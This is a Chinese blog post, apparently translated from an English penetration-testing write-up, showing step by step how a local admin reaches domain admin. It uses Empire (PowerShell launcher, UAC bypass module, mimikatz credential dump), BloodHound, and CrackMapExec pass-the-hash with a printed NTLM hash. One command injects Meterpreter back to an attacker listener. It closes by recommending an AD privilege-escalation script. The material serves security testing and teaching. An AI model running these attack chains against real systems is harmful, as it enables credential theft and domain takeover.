使用Empire进行域渗透

0x01 前言

文章来源于
https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/
Empire主要针对后渗透,我的建议是对于redteam来说,SSL加密是必须的,CS自带的有这个功能,不过是专业版才有,La1y弄的那个好像支持。

0x02

我现在收集了本地用户凭据并升级到本地管理员,我的下一步目标是想要拿到DC权限。由于我是本地管理员,我可以使用Bloodhound,它将帮我画出整个域并显示我的下一个目标的位置。在我的Windows主机上运行Bloodhound之后(wiki:https://github.com/BloodHoundAD/Bloodhound/wiki),然后我确定了域管理员Jaddmon登录的服务器是2008R2SERV。

ps:Bloodhound怎么玩?看这里
我的第一步是尝试使用Crackmapexec来调用Mimikatz并转储凭据,但是这台机器上的SMB不允许登录,所以我必须找到另一种方法。

由于我拥有本地管理员权限,因此我继续将RDP引入服务器,然后我使用Empire在服务器上获得一个shell。

使用Empire很简单:启动之后,然后启动一个监听器,如下所示


然后生成payload:

1
launcher powershell http

生成一个powershell payload,开始监听。

我复制这个命令,切换到RDP会话,打开命令提示符并粘贴它。


当它运行时,我在Empire看到我现在在那台机器上有一个代理。


要与它进行交互,我先输入:

1
agents

然后:

1
interact VLLRZY4EC (代理的name)

即使我是本地管理员,我仍然必须绕过UAC。幸运的是,Empire有一个模块。然后输入:

1
usemodule privesc/bypassuac
1
set Listener http

然后我在机器上获得另一个代理,然后我再次与该新代理进行交互。

下面就是dump 一些凭证:

1
mimikatz

1
creds

然后我看到域管理员哈希密码。

我不会破解密码,因为这很简单。相反,我将使用Crackmapexec传递哈希值。
然后就是通过crackmapexec:

1
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares


成功!
你也可以用它来得到一个shell

1
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST = 192.168.1.63 LPORT = 4443

msf开启监听:

拿到DC权限:

0x03 总结

这是利用Active Directory配置错误进入域管理员的众多方法之一 。如前所述,这不是渗透测试的结束。我接下来的步骤是尝试其他方法来访问域管理员或任何其他帐户,因为进行了渗透测试是要发现网络中的所有bug,而不仅仅是一个漏洞。

0x04 彩蛋

最后,推荐这个博主的一个Active Directory评估和权限提升脚本
https://github.com/hausec/ADAPE-Script/tree/master

功能如下:

  • 通过WPAD,LLMNR和NBT-NS欺骗收集哈希值
  • 检查GPP密码(MS14-025)
  • 绘制域并通过BloodHound识别目标
  • 检查权限提升方法
  • 在网络上搜索开放的SMB共享
  • 搜索敏感文件和字符串的这些共享和其他可访问目录
  • 检查网络上的系统补丁
  • 搜索文件服务器
  • 搜索附加票据
  • 收集域策略
1
PowerShell.exe -ExecutionPolicy Bypass ./ADAPE.ps1

以及github上一个大牛整合的cs脚本,skr。

1
https://github.com/invokethreatguy/CSASC

体验完这些脚本我可能会总结一下,以及cna的开发。

打赏wing!